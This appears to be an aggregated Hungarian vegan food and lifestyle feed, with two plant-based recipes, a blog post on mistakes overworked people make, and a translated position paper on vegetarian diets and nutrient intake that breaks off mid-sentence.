Egy egyszerű, olcsó, és nagyon finom főétel a rakott kelkáposzta: ebben nincs semmilyen húst helyettesítő anyag, inkább túróra hasonlít a kölesből készült réteg. Hozzávalók: fél fej kelkáposzta 2 dl köles 1 kisebb vöröshagyma 2 pohár vegán tejföl (vagy szójajoghurt) 2 dl. édesítetlen növényi tej 1 kávéskanál kapor (ha szereted) 2 gerezd fokhagyma só pici olaj a tepsi kiolajozásához növényi sajt (opcionális) A kelkáposztát sós vízben megfőzzük, hogy még roppanós legyen. A vöröshagymát felkarikázva, pici sóval, vízzel, alacsony lángon, fedő alatt megpároljuk egy tapadásmentes serpenyőben. A kölest a növényi tejjel, sóval, kaporral, a fokhagymanyomón átnyomott fokgagymával, és még 4 dl vízzel készre főzzük. (Háromszoros legyen a folyadékmennyiség a köles mennyiségéhez képest.) A kiolajozott tepsit a párolt hagymával, főtt kölessel, vegán tejföllel, kelkáposztával rétegezzük, a tetejére mehet növényi sajt, de nem muszáj. Sütőben kb 200 fokon pirosra sütjük. Vegán tejfölből jelenleg a Dr. Oetker tejföle az egyetlen opció Magyarországon, Aldiban, Auchanban általában kapható, de más nagy és közepes áruházakban, bioboltokban is fellelhető. Tedd a kedveceim közé 0 The post Kölestúróval rakott kelkáposzta – vegán recept appeared first on VegaNinja.
TOP 10 hiba, amit a túlterhelt emberek elkövetnek
2019. május 22. Élj harmóniában
A túlterheltség, a krónikus kimerültség nagyon gyakori probléma a mai modern nyugati világban. Már a nagyon fiataloknál, iskolás gyerekeknél is sokszor jelentkezik kimerültség a teljesítmény kényszernek, túl sok elvárásnak köszönhetően. Felnőtt korban pedig a magyarok jelentős része küzd kimerültséggel az állandó túlterheltség miatt. Életem során több mint 2000 embert tanítottam jógára, relaxációra és a legtöbben állandóan túl voltak terhelve. A túlterheltség elsődleges fő oka általában saját magunk vagyunk... a legtöbb ember nem hagyja magát pihenni, feltöltődni. Ha végre van egy kis ideje, feltöltődés helyett inkább valami aktív tevékenységbe kezd. Az állandó megfelelési kényszer, bizonyítási vágy, az aggodalom attól, hogy valaki lemarad valamiről előbb utóbb, teljesen kimeríti a szervezetet. Egy túlterhelt ember, ha elmegy nyaralni, nem pihen hanem ezer programot szervez, ide oda szaladgál vagy éppen hegyet mászik... Az idegrendszered és a pihenés kapcsolatáról ezen a linken olvashatsz részletesen. Amikor úgy tapasztalod túl vagy terhelve, akkor lásd elérkezettnek az időt, hogy változtass. Ha semmin nem változtatsz és mindent ugyanúgy csinálsz, akkor sajnos az eredmény is ugyanaz lesz... kisebb felpörgések után, újra és újra kimerültséget fogsz tapasztalni, valamint a túlterhelés miatt elképzelhető, hogy romlik az egészségi állapotod, gyengül az immunrendszered ingerültebb, türelmetlenebb vagy depressziós leszel, ezek pedig már az emberi kapcsolataidra is hatással lesznek. Összeírtam a legtipikusabb hibákat, amiket a túlterhelt emberek elkövetnek... 1. Nem tudnak "nem"-et mondani. 2. Szeretnének megfelelni mások elvárásainak. 3. Aggódnak, hogy lemaradnak valamiről. 4. Kevés időt töltenek csendben, befelé figyelve. 5. Teleteszik a naptárukat programokkal, feladatokkal 6. Nem hagynak időt a töltődésre, relaxációra. 7. A pihenést fölösleges időtöltésnek, lustálkodásnak gondolják. 8. Túl nagy elvárásaik vannak saját maguk és mások felé is. 9. Sokszor azt gondolják, ők tudnak megoldani valamit a legjobban. 10. Nem osztják meg a feladatokat másokkal. +1 Ami általában a fő oka a túlterhelésnek, hogy nem hiszik el, hogy úgy ahogy vannak szerethetőek. Azt gondolják mindig valamilyen teljesítményt kell letenniük az asztalra... Engedd magad többet pihenni, befelé figyelni, töltődni. Sajátítsd el a relaxációt és gyakorold rendszeresen. A blogon számos gyakorlatot, praktikus tanácsot olvashatsz, amiket beépítve a hétköznapjaidba minimalizálhatod a túlterhelést . Alkalmazd a kevesebb több elvet:) szeretettel: Kati
Savanyú káposztalevél batyu
Amikor ezt a receptet írtam, teljesen érzésre ment a főzés. Egyet tudtam csak, hogy a savanyú káposzta leveléből valami isteni dolgot szeretnék csinálni, ami után megnyalom mind a tíz ujjamat. Jesszus Mária, ez most vagy sikerült, vagy tényleg ennyire savanyú káposzta rajongó vagyok . :D A mennyiségeket mindenesetre pontosan lejegyeztem, szóval, ha pontosan így csinálod, ugyanilyen lesz a te batyud is. :) Hozzávalók 2-3 adaghoz (8-10 batyu) - 150 g barna rizs - 2 fej vöröshagyma - 2 gerezd fokhagyma - 1,5 kk pirospaprika - 1/2 mk őrölt kömény - 1/2 mk egész kömény - 2 kk szójaszósz (igen!) - 500 g savanyított káposztalevél (8-10 db) Végy egy nagyobb, mélyebb serpenyőt vagy lábost, és 1-2 evőkanál olajon pirítsd meg az apróra vágott vöröshagymát. Én kényelmes voltam, egyszerűen betettem a késes aprítóba, így szinte püré lett belőle, de persze az sem baj, ha darabos. Amikor megpirult, jött a reszelt fokhagyma, és a tűzről levéve a pirospaprika, őrölt kömény is. A szójaszószt itt locsoltam rá, ez akár ki is hagyható, de én nagyon szeretem, mert még az ilyen magyaros ételeknek is emel az ízén. Persze keress belőle jó minőségűt; ha rám hallgatsz, a mű ízfokozósat inkább otthagyod az üzletben. - Ezen a jó hagymás alapon főzd meg félig a rizst. Fél liter vízzel felöntve, megsózva rotyogtasd, amíg a víz elpárolog. Amikor kész, zárd el, és hagyd hűlni kicsit. - A batyukhoz a káposztalevelek vastag erét a levél feléig benyúlva ki kell vágni, így tudod majd szépen becsomagolni a tölteléket. Mindegyik batyuba egy púpozott evőkanál rizs kerüljön, majd tekerd fel lazán. Laza csomagocskákat készíts, hiszen a rizs még dagadni fog. - Ezután egy jénai tálba fektesd őket szorosan egymás mellé, és kenegesd meg olajjal a tetejét. - Szórd meg egész köménnyel, önts alá egy pohár vizet, és kezd el sütni 200 fokon. Amikor a víz elpárolgott, akkor önts alá még egy pohárral. - Légkeveréses sütőben 50 perc perc alatt szép pirosra sül. :) Jó étvágyat! Elkészítési idő: kb. 20 perc + sütés Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven The post Savanyú káposztalevél batyu appeared first on Kertkonyha.
Csak a magyarok harmada eszik naponta zöldséget
Ez messze a legrosszabb arány az Európai Unióban.
A Táplálkozási és Dietetikai Akadémia (Academy of Nutrition and Dietetics) állásfoglalása a vegetáriánus étrendekről
KIVONAT: A Táplálkozási és Dietetikai Akadémia úgy foglal állást, hogy a megfelelően összeállított vegetáriánus étrend, beleértve a vegán étrendet is, egészséges, tápanyag bevitel szempontjából megfelelő, és egészségügyileg előnyös lehet bizonyos betegségek megelőzésében és kezelésében. Ezek az étrendek megfelelőek az emberi életciklus minden szakaszában, beleértve a terhességet, a szoptatást, a kisgyermekkort, a gyermekkort, a serdülőkort, az idősebb felnőttkort és a sportoló életmódot is. A növényi alapú étrend környezetkímélőbb, mint az állati termékekben gazdag étrend, mivel kevesebb természeti erőforrást használ és sokkal kevesebb környezeti kárt okoz. A vegetáriánusok és a vegánok kevésbé vannak kitéve bizonyos egészségügyi problémák – például az iszkémiás szívbetegség, a 2-es típusú cukorbetegség, a magas vérnyomás, bizonyos típusú rákok és az elhízás - kockázatának. Kevés telített zsír fogyasztása és a zöldségek, gyümölcsök, teljes kiőrlésű gabonák, hüvelyesek, szója-termékek, diófélék és magvak (ezek mind rostban és fitokemikáliában gazdag táplálékok) nagymértékű bevitele a vegetáriánus és a vegán étrend olyan jellemzői, amelyek az összes koleszterin, illetve az LDL-koleszterin alacsonyabb szintjével és jobb szérum-glükóz-szabályozással járnak együtt. Ezek a tényezők hozzájárulnak a krónikus betegségek csökkentéséhez. A vegánoknak megbízható B12-vitamin forrásra van szükségük, ezek lehetnek például vitaminnal dúsított ételek vagy étrend-kiegészítők. J Acad Nutr Diet. 2016; 116: 1970-1980. A VEGETÁRIÁNUS ÉS VEGÁN táplálkozási szokások meglehetősen változatosak lehetnek a rendelkezésre álló élelmiszer-választék és az ilyen étrendek mögött álló motiváló tényezők különbözősége miatt. A döntés oka lehet az állatok iránti együttérzés, a vágy, hogy jobban védjék a környezetet, hogy csökkentsék a krónikus betegségek kockázatát, vagy a már kialakult betegség kezelése. A jól megtervezett, zöldségeket, gyümölcsöket, teljes kiőrlésű gabonákat, hüvelyeseket, dióféléket és magvakat tartalmazó vegetáriánus étrend megfelelő mennyiségű tápanyagot biztosít. A vegetáriánus étrend nem tartalmaz húsételeket (baromfit, vadhúst, tengeri állatokat és a belőlük készült termékeket sem). 1. ábra: a leggyakoribb növényi alapú étrendek. A vegetáriánus étrend bizonyos tápanyagok csökkentett bevitelének kockázatával jár, azonban ezek a hiányosságok könnyen elkerülhetők megfelelő tervezéssel. Étrend típusa Étrendi jellemző (mindegyik húsmentes) Vegetáriánus Tojást és tejterméket tartalmaz / nem tartalmaz. Lakto-ovo vegetáriánus Tejterméket és tojást is tartalmaz. Lakto-vegetáriánus Tejterméket tartalmaz, de tojást nem tartalmaz. Ovo vegetáriánus Tojást tartalmaz, de tejterméket nem tartalmaz Vegán Sem tojást, sem tejterméket nem tartalmaz, mézet tartalmazhat Nyers vegán Zöldségeken, gyümölcsö-kön, dióféléken, magva-kon, hüvelyeseken, és csíráztatott gabonákon alapuló étrend. A nyers ételek aránya 75 és 100% között változhat. 1. ábra, A vegetáriánus étrendek típusai. A VEGETÁRIÁNUS ÉTRENDEK ÁTTEKINTÉSE Vegetáriánus irányzatok Egy országos felmérés szerint 2016-ban körülbelül az amerikai felnőttek 3,3%-a volt vegetáriánus vagy vegán (soha nem eszik húst, tehát baromfit és halat sem), és körülbelül a vegetáriánusok 46%-a vegán1. Ugyanebből a felmérésből derült ki, hogy a fiatal felnőttek 6%-a (18-34 évesek) vegetáriánus vagy vegán, míg a 65 éves vagy annál idősebb korosztályban mindössze 2% ez az arány. A hús-helyettesítő termékek forgalma 2012-ben elérte az 553 millió dollárt, ez 8%-os növekedést jelent 2 év alatt. Megfigyelhető, hogy a válaszadók 36%-a főleg vegán húshelyettesítőket keresett, jellemzően a 18-44 éves korosztályból.1,2 Míg a teljes növényi élelmiszerek szolgáltatják a legjobb mindennapi táplálék-forrást, egyes feldolgozott és dúsított termékek, például a növényi alapú italok, húspótlók és reggeli gabonafélék, jelentős mértékben hozzájárulhatnak a vegetáriánusok tápanyagbeviteléhez. A növényi alapú étrend, beleértve a vegetáriánus és a vegán étrendet is, egyre elfogadottabbá válik, amint ezt sok nonprofit szervezet és kormányzati intézmény ajánlása is kiemeli. Az Amerikai Rákkutató Intézet a növényi alapú étrendeket ajánlja, valamint javasolja, hogy az amerikaiak táplálékának kétharmada zöldségekből, gyümölcsökből, teljes kiőrlésű gabonákból és babfélékből álljon.3 A 2015-2020-ra vonatkozó Amerikaiak Táplálkozási Iránymutatásában a vegetáriánus étrend a három ajánlott egészséges táplálkozási mód egyike és étkezési terveket biztosítanak lakto-ovo vegetáriánusok és vegánok számára is.4 A Nemzeti Iskolai Ebéd Program, bár nem írja elő a vegetáriánus lehetőség biztosítását, de előírja az iskoláknak a gyümölcsök, zöldségek és teljes kiőrlésű gabonák arányának növelését az iskolai menüben. Ezeken túl a vegetáriánus étrendnek technológiai támogatása is van. Ugyan még nincs kifejezetten vegetáriánusok számára készített online tápanyag-kiértékelő rendszer, de némelyik ilyen rendszer lehetővé teszi a vegetáriánus és vegán táplálkozási opció választását. Ezek a mobil alkalmazások segítenek a vegetáriánusoknak a táplálkozási igényeik felfedezésében, a tápanyag-bevitel értékelésében és vegán éttermek, üzletek megtalálásában, ahol számukra megfelelő ételek kaphatók. A www.SuperTracker.usda.gov címen működő rendszer például az Egyesült Államok Mezőgazdasági Minisztériuma ,,Choose My Plate programjának része.5 MEGFONTOLANDÓ SZEMPONTOK A VEGETÁRIÁNUSOK SZÁMÁRA Fehérje A vegetáriánus étrendek - tehát a vegán táplálkozás is - általában megfelelnek a javasolt fehérje-beviteli szükségleteknek, vagy meg is haladják azt, ha a kalóriabevitel megfelelő.6,7,8 A teljes értékű és nem teljes értékű kifejezések félrevezetőek a növényi fehérjét illetően. A nap folyamán elfogyasztott különböző növényi fehérjék megfelelő mennyiséget tartalmaznak minden nélkülözhetetlen (esszenciális) aminosavból, ha a kalóriabevitel megfelelő.7 Hüvelyesek és szója rendszeres fogyasztása biztosítja a megfelelő fehérjebevitelt és más alapvető tápanyagok bevitelét is. A fruitariánus (gyümölcs alapú) étrend fehérjéből és más tápanyagokból általában keveset tartalmaz. A kiegyensúlyozott vegetáriánus étrend minden élethelyzetben kielégíti a szervezet fehérjeszükségletét, még sportolók esetében is.7,8 n-3 zsírsavak Míg a vegetáriánusok és a vegánok alfa-linolénsav (ALA) bevitele hasonló a nem vegetáriánusokéhoz, addig a hosszú láncú n-3 zsírsavak – eikozapentaénsav (EPA) és dokozahexaénsav (DHA) - bevitele alacsonyabb a vegetáriánusoknál és jellemzően hiányzik a vegánoknál.10,11 A nem vegánokkal összehasonlítva a vegánok vérében és a szöveteiben az EPA és a DHA szintje jelentősen alacsonyabb.10,11 A csökkent EPA és DHA státusz klinikai jelentősége a vegetáriánusok és vegánok esetében ismeretlen.11,12 A hosszú láncú n-3 zsírsavak fontos szerepet játszanak az agy, a retina és a sejtmembránok kifejlődésében, fenntartásában, és kedvezően befolyásolják a terhesség kimenetelét, a szív- és érrendszeri betegségek (CVD) és más krónikus betegségek kezelését.6,13,14 Mégis, a vegetáriánus és vegán gyermekeknél, úgy tűnik, nem tapasztalható károsodás a vizuális vagy szellemi fejlődésben, illetve a vegetáriánus és vegán felnőttek esetében a CVD-vel kapcsolatos kockázat csökkenése tapasztalható.10,11,15 Az ALA endogén módon átalakul EPA-vá és DHA-vá, de a folyamat hatásfoka alacsony, és erősen függ a nemtől, az étrend összetételétől, az egészségi állapottól és az életkortól. Nagy mennyiségű linolsav (LA) bevitele akadályozhatja az ALA konverzióját.11,13 Az optimális konverzióhoz az LA/ALA arány lehetőleg ne haladja meg a 4:1 értéket.7,10,14 Az ALA javasolt napi bevitele (RDA) 1,6 g/nap férfiaknak és 1,1 g/nap nőknek.4 A biztonság kedvéért a vegetáriánusok és a vegánok számára előnyös ennél valamivel nagyobb ALA beviteli értékkel számolni.8,10 A leggazdagabb növényi n-3 zsírsav források a magvak (len, chia, gomborka, repce, és kender), a dió és az ezekből sajtolt olajok.8,10 A tények azt sugallják, hogy az egészséges emberek n-3-igényeit kielégítheti az ALA önmagában, illetve az EPA és a DHA endogén szintézise az ALA-ból elegendő ahhoz, hogy a szintek sok éven át stabilak legyenek.11,14 Alacsony dózisú mikroalga alapú DHA étrend-kiegészítők minden vegetáriánus számára elérhetők, hogy a megnövekedett igényeket (pl szoptatási időszak a nőknél) vagy a csökkent konverziós képességet (pl magas vérnyomás vagy cukorbetegség) ellensúlyozzák.10 Vas A vegetáriánusok vasbevitele általában azonos szintű vagy valamivel magasabb, mint a vegyes táplálkozásúaké.16 Annak ellenére, hogy a vas bevitele hasonló,17 a vegetáriánusok szervezete tipikusan kevesebb vasat raktároz, mint a nem vegetariánusoké. Az alacsonyabb szérum ferritin szint előnyt jelenthet, mert a szérum ferritin magas szintje önmagában növeli az anyagcsere zavarok kialakulásának kockázatát.18 A vegetáriánusok vasszintje miatti aggodalmak felvetették a növényi ételekben található nem hem vas biológiai hasznosíthatóságának kérdését. A nem hem vas abszorpciója a fiziológiai igényektől és részben a szervezet által raktározott vas mennyiségétől függ. A felszívódás nagyon változó a táplálék összetétele és a raktározott vas mennyisége függvényében. A nem hem vas biohasznosulását befolyásolják még felszívódást gátló tényezők, mint a fitátok és polifenolok illetve felszívódást segítő tényezők, mint a C-vitamin, a citromsav és egyéb szerves savak.19 Egy friss tanulmány kimutatta, hogy a nem hem vas felszívódása 1% és 23% között változott a szervezet vas-státuszától, illetve a felszívódást segítő és gátló tényezőktől függően.20 Egy újonnan kifejlesztett regressziós egyenlet lehetővé teszi a vasfelszívódás előrejelzését a szérumferritin szintje és a táplálékban lévő módosító tényezők alapján. A táplálék összetétele nagyobb hatást gyakorolt a vas felszívódására ha a szérumferritin szintje alacsony volt.20 A nem hem vas felszívódása akár 10-szer nagyobb lehet vashiányban szenvedőknél, mint a túl magas vasszinttel rendelkezőknél. Az RDA 2001-ben a vegetáriánusok számára 80%-kal több vasat írt elő, mint a nem vegetáriánusoknak. Ezt abból a feltételezésből vezették le, hogy a vegetáriánus étrendből származó vas felszívódása csak 10%-os míg a nem vegetáriánus étrendből származó vasé 18%-os.21 Ez a feltételezés nagyon korlátozott mennyiségű adat felhasználásával, egyszeri abszorpciós vizsgálatok, illetve a fejlett országok vegetáriánusaira nem jellemző táplálékok alapján készült. Ma már tudjuk, hogy a szervezet képes alkalmazkodni és képes sokkal hatékonyabban beépíteni a nem hem vasat.22 A vasfelszívódást elősegítő és csökkentő tényezők jelentősége idővel csökken.23 A szervezet alkalmazkodni tud az alacsony vasbevitelhez az idő múlásával, és képes a vasveszteséget is csökkenteni.24 Egy tanulmányban a vasabszorpció jelentősen, közel 40%-kal megnövekedett 10 hétig tartó alacsony vastartalmú diéta fogyasztása során.22 Az alacsony vasszinttel rendelkező emberek képesek lényegesen megnövelni a vasfelszívódás mértékét mérsékelt vagy magas vastartalmú ételek fogyasztása esetén. Úgy tűnik, hogy a fejlett országokban élő vegetáriánusoknál a felszívódási folyamat hatékonyan alkalmazkodik, mert a hemoglobinszintjük és a legtöbb vasszinttel kapcsolatos értékük hasonló a nem vegetáriánusokéhoz.7 Cink A tanulmányok azt mutatják, hogy a nem vegetáriánus kontrollcsoportokhoz képest a felnőtt vegetáriánusok étkezési cinkbevitele hasonló vagy valamivel alacsonyabb szintű, és a szérum-cinkkoncentrációjuk alacsonyabb, de a normál tartományon belül van.7,25 Az alacsonyabb cinkszintnek nem tulajdonítható káros következmény, valószínűleg a szervezet szabályozó mechanizmusainak köszönhetően, amelyek lehetővé teszik a vegetáriánus étrendhez való alkalmazkodást. Egyértelmű cinkhiány nem áll fenn a fejlett világ vegetáriánusai esetében. A népesség leginkább veszélyeztetett csoportjait (idősebbek, gyermekek, terhes és szoptató nők) illetően nincs elegendő adatunk arról, hogy a cink státusz alacsonyabb-e vegetáriánusoknál, mint a nem vegetáriánusoknál.25 A vegetáriánusok cinkforrásai: szójatermékek, hüvelyesek, gabonafélék, sajt, magvak és diófélék. Az olyan ételkészítési technikák, mint az áztatás és csíráztatás a babfélék, gabonák, diófélék és magvak esetében, valamint a kenyér kovászolása csökkenti a fitátok cinkkötő hatását, így növeli a cink felszívódását.26 Szerves savak, mint a citromsav, szintén növelhetik bizonyos mértékig a cinkabszorpciót.26 Jód A növényi alapú étrend jódban szegény lehet, így azok a vegánok, akik nem fogyasztanak kulcsfontosságú vegán jódforrásokat, például jódozott sót vagy tengeri zöldségeket, jódhiány veszélyének vannak kitéve.7,27 A tengeri zöldségek (tengeri algák, hínárok) jódtartalma nagyon változó és némelyik jelentős mennyiségű jódot tartalmazhat.28 A jódbevitel nem haladhatja meg a megengedett napi felső értéket, ami felnőttek esetében 1100 ug.29 Vegán nőknek várandósság idején további napi 150 ug jódra van szükségük.27,29 A tengeri só, a kóser só és a sós fűszerek, mint például a tamari, általában nem jódozottak,7 és a feldolgozott élelmiszerekben sem jódozott sót használnak. A tejtermékek tartalmazhatnak jódot, de a mennyiség erősen változó.7 Bár az olyan élelmiszerek, mint a szója, a keresztesvirágúak, illetve az édesburgonya tartalmaznak természetes goitrogént, ezek az ételek nem okoznak pajzsmirigy elégtelenséget egészséges emberekben, feltéve, hogy a jód bevitel megfelelő.7,8,29,30 Kalcium A lakto-ovo vegetáriánusok kalciumbevitele általában eléri vagy meghaladja az ajánlott értéket, míg a vegánok esetében ez nagyon változó, és néha az ajánlott érték alatt marad.7 A növényi kalcium biológiai hozzáférhetősége összefügg az élelmiszerek oxaláttartalmával, és kisebb mértékben a fitát- és a rosttartalommal is, ez nagyon fontos szempont. A felszívódás mértéke nagy oxaláttartalmú zöldségekből, például a spenótból, céklalevélből, mángoldból akár 5%-ig is csökkenhet. Így ezek nem tekinthetők jó kalciumforrásoknak, annak ellenére, hogy magas a kalciumtartalmuk. Összehasonlításképpen, a felszívódás alacsony oxalát tartalmú zöldségekből, mint a fodros kel, a tarlórépalevél, a kínai kel és a bordás kel, körülbelül 50%.31 A kalciummal dúsított (kalciumsóval készült) tofuból és a legtöbb kalciummal dúsított növényi tejből – a tehéntejhez hasonlóan kb 30% szívódik fel.32,33 Egyéb növényi élelmiszerek, például a fehérbab, a mandula, a tahini, a füge és a narancs, mérsékelt mennyiségű kalciumot tartalmaznak, valamivel alacsonyabb biohasznosulással (kb. 20%). Ehhez képest a kalciumtartalom dúsításához használt kalciumvegyületek közül a kalcium-citrát-malát biohasznosulása legalább 36%, míg más anyagoké kb. 30%.34 Regisztrált dietetikus táplálkozási szakértők (RDN) és regisztrált táplálkozási tanácsadók (NDTRs) segíteni tudnak a megfelelő kalciumbevitel elérésében a kalciumban gazdak ételek fogyasztásának hangsúlyozásával, szükség esetén alacsony dózisú táplálékkiegészítők alkalmazásával. D-vitamin A szervezet D-vitamin-szintje a napfényen töltött időtől és a D-vitaminban gazdag élelmiszerek vagy étrend-kiegészítők fogyasztásától függ.35 Napozás során a bőr által termelt D-vitamin mennyisége nagyon változó, nagyban függ a napszaktól, az évszaktól, a földrajzi szélességi foktól, a levegő szennyezettségétől, a bőr pigmentációjától, fényvédő krémek használatától, a napfénynek kitett bőrfelület nagyságától és az életkortól.35,36 Egyes vegetáriánusok és vegánok esetében beszámoltak alacsony D-vitamin-bevitelről, illetve alacsony plazma- vagy szérum- 25-hidroxi-D-vitamin-szintről, ez utóbbi különösen a télen vagy tavasszal vett vérmintáknál és különösen a magas földrajzi szélességen élők körében fordult elő.36 Étkezési és táplálékkiegészítő D-vitamin-források általában szükségesek a megfelelő D-vitamin-szint eléréséhez. D-vitaminnal dúsított élelmiszerek: a tehéntej, egyes növényi tejek, gyümölcslevek, reggeli gabonapelyhek és margarinok. A tojás is szolgáltathat némi D-vitamint. Ultraibolya fénnyel kezelt gombák jelentős D-vitamin-források lehetnek.36,37 Mind a D2-vitamint, mind a D3-vitamint használják táplálékkiegészítőként és élelmiszerek D-vitamin-tartalmának növelésére is. A D3-vitamin (kolekalciferol) lehet növényi vagy állati eredetű, míg a D2-vitamint (ergokalciferol) az élesztőből származó ergoszterin ultraibolya besugárzásával állítják elő. Alacsony adagokban a D2 és a D3-vitamin egyenértékű, de magasabb dózisokban a D2-vitamin kevésbé hatásosnak tűnik.36 Ha a napsugárzás és a D-vitaminnal dúsított élelmiszerek bevitele nem elegendő az igények kielégítésére, táplálékkiegészítő D-vitamin szedése ajánlott, különösen az idősebb felnőttek számára.35,36,38 Mivel a D-vitamin számos anyagcsere-folyamatot befolyásol a csontanyagcserén túl,35,38 egyes szakértők javasolják napi 1000-2000 NE vagy még több D-vitamin bevitelét. B12-vitamin A B12-vitamin nem található meg a növényi élelmiszerekben.7,39 Fermentált élelmiszerek (például a tempeh), nori (tengeri zöldség, hínár), spirulina, chlorella algák, és a nem dúsított sörélesztő-pehely nem tekinthető megbízható B12-forrásnak.39,40 Vegánoknak rendszeresen kell fogyasztaniuk megbízható B12-vitamin-forrást, azaz a B12-vitaminnal dúsított élelmiszert vagy B12-vitamin tartalmú táplálék-kiegészítőt - egyébként-vitaminhiányos állapot alakulhat ki, amint ezt vegán csecsemőkön, gyermekeken és felnőtteken végzett esettanulmányok mutatják.8,39 A legtöbb vegetáriánusnak is bele kellene illesztenie ezeket a megbízható B12 forrásokat az étrendjébe, mert naponta 1 pohár tej és egy tojás csak körülbelül a kétharmadát fedezi az ajánlott napi bevitelnek (RDA).7,39,40 A súlyos B12-hiány korai tünetei a fáradékonyság, bizsergés a kéz- vagy lábujjakban, a rossz mentális állapot, a rossz emésztés és az elégtelen fejlődés kisgyermekeknél. Csekély mértékű B12-hiány magas homocisztein-szintet eredményez. Alacsony B12-bevitel vagy a B12-bevitel teljes hiánya mellett is egészségesnek érezheti magát valaki, de hosszú távon már a kis fokú hiány is sztrókhoz, demenciához és a csontok rossz állapotához vezethet.7,8,41 A B12-vitamin-szint mérésére alkalmas laboratóriumi vizsgálatok: a szérum metil-malonsav-tartalmának, a szérum vagy a plazma B12-szintjének és a szérum holo-transzkobalamin-tartalmának (Holo-TC vagy Holo-TCII) mérése.8,39,41 A B12-felszívódás normál mechanizmusa az úgynevezett belső tényező (intrinszik faktor, a gyomornedv antianaemiás faktora) révén történik, amely körülbelül az RDA felénél telítődik, és a szervezet csak 4 – 6 óra múlva képes további felszívásra.40 Ezért a dúsított ételeket legjobb két részre osztva fogyasztani a nap folyamán. Egy másik abszorpciós mechanizmus, a passzív diffúzió 1%-os hatékonysággal teszi lehetővé a nagy dózisú B12-t tartalmazó táplálék-kiegészítők ritkább fogyasztását. Az ajánlásokat nagy dózisok alapján állapították meg (pl. 500 – 1000 ug cianokobalamin hetente több alkalommal).8,39 A B12-vitaminnak négy formáját ismerjük, melyek a kobalaminhoz kapcsolódó csoportokban különböznek egymástól. A ciano-kobalamin a leggyakrabban használt forma a dúsított élelmiszerekben és táplálék-kiegészítőkben, nagy stabilitása miatt. A metil-kobalamin és az adenozil-kobalamin a szervezet enzimatikus reakcióiban szereplő formák, ezek táplálék-kiegészítőként kaphatók. A tapasztalatok azt mutatják, hogy nem hatékonyabbak, mint a ciano-kobalamin, az ajánlott napi értéknél nagyobb dózisra lehet belőlük szükség. A hidroxi-kobalamin injekciókban alkalmazható hatékonyan.8,42 VEGETÁRIÁNUS ÉTREND A TERÁPIÁBAN ÉS A KRÓNIKUS BETEGSÉGEK Ha a táplálkozási oktatás megfelelő, a terápiás vegetáriánus étrend ugyanolyan jól betartható, mint a vegyes étrend.43 Motivációs interjúkkal, gyakori megbeszéléssel, főzési bemutatókkal és további ösztönző stratégiák alkalmazásával tovább javítható a vegetáriánus étrend terápiás használatának eredménye, ahogyan más terápiás étrendeknél ezt megszokhattuk. Túlsúly és elhízás Az amerikai népesség több mint kétharmada - és egyre növekvő hányada – túlsúlyos vagy elhízott.44 A dietetikusnak ismernie kell azt a tényt, hogy a vegetáriánus és vegán táplálkozás elősegíti az egészséges testsúly elérését és fenntartását. Az egészséges testsúly összefügg a szív és érrendszeri funkciók javulásával,45 az inzulinérzékenységgel,46 valamint segít csökkenteni más krónikus betegségek kockázatait is.45 A növényi alapú táplálkozás összefügg az alacsony testtömeg-indexszel is (BMI, kg/m2-ben). A második Adventista Egészségügyi Tanulmányban (Adventist Health Study-2), az átlagos BMI a húsevőknél volt a legmagasabb (28,8), és azoknál volt a legalacsonyabb, akik elkerülik az összes állati terméket (23,6).47 Hasonlóképpen, a EPIC-Oxford tanulmányban, a kutatók a legmagasabb átlagos BMI-t a húsevőknél (24,4) és a legalacsonyabbat a vegánoknál (22,5) mérték.48 A svéd Mammográfia kohorsztanulmányban a kutatók megállapították, hogy a túlsúly vagy az elhízás előfordulása a mindenevőknél 40%, a vegetáriánusoknál 25%.49 A kutatások azt mutatják, hogy a vegetáriánus étrend hatékonyan használható a túlsúly kezelésére és jobb alternatíva, mint a hasonló céllal összeállított mindenevő étrend. Beavatkozásos kísérletek két metaanalízise azt mutatta ki, hogy a vegetáriánus étrend alkalmazása nagyobb súlycsökkenéssel jár a kontroll csoportokhoz képest.50,51 A vegán étrend strukturált csoporttámogatással és viselkedési terápiával jelentősen nagyobb testsúly-csökkenést eredményezett, mint a Nemzeti Koleszterin Oktatási Program által összeállított étrend52 az egy- illetve kétéves vizsgálati időszak alatt. Szív és érrendszeri betegségek (CVD), beleértve a hiperlipidémiát, az iszkémiás szívbetegséget, és a magas vérnyomást A vegetáriánus étrendek a CVD kockázatának csökkenésével járnak.15,53 A vegetáriánus étrendek számos szívbetegség kockázati tényezőn javítanak, például a hasi elhízáson,54 a magas vérnyomáson,55 a szérum lipidprofiján,56 és a vércukor szinten.42,57 Szintén csökkentik a gyulladásos markereket, mint például a C-reaktív proteint, az oxidatív stressz, és védenek az ateroszklerotikus plakkok képződésével szemben.58 Következésképpen, a vegetáriánusok esetében csökken az iszkémiás szívbetegség kialakulásának, és az általa okozott halálnak a kockázata.15,53,59 A vegán étrend a legkedvezőbb a szívbetegségek kockázati faktorainak csökkentésében.55,57 Az EPIC-Oxford tanulmányból60 kiderült, hogy a növényi táplálkozást követők fogyasztották a legtöbb rostot, a legkevesebb zsírt, illetve telített zsírt, és nekik volt a legegészségesebb testtömegük és koleszterinszintjük a mindenevőkkel és más vegetáriánusokkal összehasonlítva. Tizenegy randomizált, kontrollcsoportos vizsgálat metaanalízise kimutatta, hogy a vegetáriánusoknál a teljes koleszterinszint, az LDL- és a HDL-koleszterin-szint oly módon csökkent, ami a szívbetegségek kockázatában körülbelül 10%-os csökkenésnek felel meg.56 A vegetáriánus étrend különösen előnyös volt az egészséges testsúlyú és a túlsúlyos emberek esetében, de kevésbé hatékony az elhízottak számára, ezért kiemelten fontos a korai étrendi beavatkozás a hosszú távú kockázatcsökkentés érdekében.56 A második Adventista Egészségügyi Tanulmányban 73308 hetednapi adventista vizsgálata alapján a kutatók azt állapították meg, hogy a vegetáriánusoknál 13%-kal csökkent a CVD és 19%-kal az iszkémiás szívbetegség kialakulásának kockázata a nem vegetáriánusokkal összehasonlítva.15 Az EPIC tanulmány egy korábbi elemzése szerint a vegetáriánusoknál 32%-kal alacsonyabb a szívbetegség miatti kórházi kezelés és a szívbetegség miatti halál kockázata.53 A vegetáriánusok esetében azért kisebb a szívbetegségek kockázata, mert 